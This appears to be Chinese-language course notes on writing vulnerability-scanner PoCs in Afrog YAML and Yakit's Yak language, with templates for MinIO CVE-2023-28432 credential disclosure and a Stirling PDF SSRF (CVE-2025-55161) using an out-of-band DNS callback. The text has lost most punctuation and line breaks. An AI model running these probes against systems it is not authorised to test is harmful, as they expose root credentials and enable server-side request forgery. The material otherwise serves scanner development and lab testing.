漏扫发现-Web服务篇Poc开发Yakit插件编写Afrog项目Yaml语法Yak语言接受匹配
知识点Poc开发-远程漏扫-Afrog项目Yakit原生语法模版插件演示案例-Poc开发-远程漏扫-Afrog项目Yakit原生语法模版插件一、Afrog Poc开发官方POC规则写法https://github.com/zan8in/afrog/wiki/Afrog-PoC-%E8%A7%84%E5%88%99%E7%BC%96%E5%86%99%E6%9D%83%E5%A8%81%E6%8C%87%E5%8D%971、MinIO集群模式信息泄露漏洞 (CVE-2023-28432)靶场地址https://github.com/vulhub/vulhub/tree/master/minio/CVE-2023-28432测试afrog.exe -t https://xx.xx.xx.xx:xxxx -P minio.yamlid: CVE-2023-28432 info: name: My PoC demo1 author: xiaodisec severity: critical rules: r0: request: method: POST path: /minio/bootstrap/v1/verify headers: Content-Type: application/x-www-form-urlencoded expression: response.status200response.body.bcontains(bMINIO_ROOT_PASSWORD)expression: r0()2、Stirling PDF SSRF漏洞 (CVE-2025-55161)测试afrog.exe -t https://xx.xx.xx.xx:xxxx -P SSRF.yaml --oob dnslogcnid: CVE-2025-55161 info: name: My PoC demo2 author: xiaodisec severity: critical set: username: randomLowercase(6)rules: r0: request: method: POST path: /api/v1/convert/markdown/pdf headers: Content-Type: multipart/form-data;boundary----WebKitFormBoundaryvAfAbBmFpYrQfooK body:|- ------WebKitFormBoundaryvAfAbBmFpYrQfooK Content-Disposition: form-data;namefileInput;filename{{username}}.mdContent-Type: application/octet-streamimgsrchttp://{{oob.DNS}}/------WebKitFormBoundaryvAfAbBmFpYrQfooK-- expression: oobCheck(oob.ProtocolDNS,5)expression: r0()二、Yakit Poc插件开发1、基于Nuclei Yaml语法官方POC编写参考地址https://www.yaklang.com/docs/security/cap8-4-yaml-poc2、基于Yak原语言(不推荐该方法比较麻烦)loglevel(info)yakit.AutoInitYakit()sendPacketfunc(target){returnpoc.HTTP(POST /minio/bootstrap/v1/verify HTTP/1.1 Host:{{params(target)}}Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q0.9,en;q0.8User-Agent: Mozilla/5.0(Windows NT10.0;Win64;x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/110.0.5481.178 Safari/537.36 Connection: close Cache-Control: max-age0Content-Type: application/x-www-form-urlencoded Content-Length:0, poc.params({target:target,}),)}targetcli.String(target)iftarget{die(no target)}resultMINIO_ROOT_USERrsp, _, errsendPacket(target)die(err)headers, bodystr.SplitHTTPHeadersAndBodyFromPacket(rsp)ifstr.MatchAllOfSubString(body, result){yakit.StatusCard(发现漏洞, target)log.info(find token: %v, result)}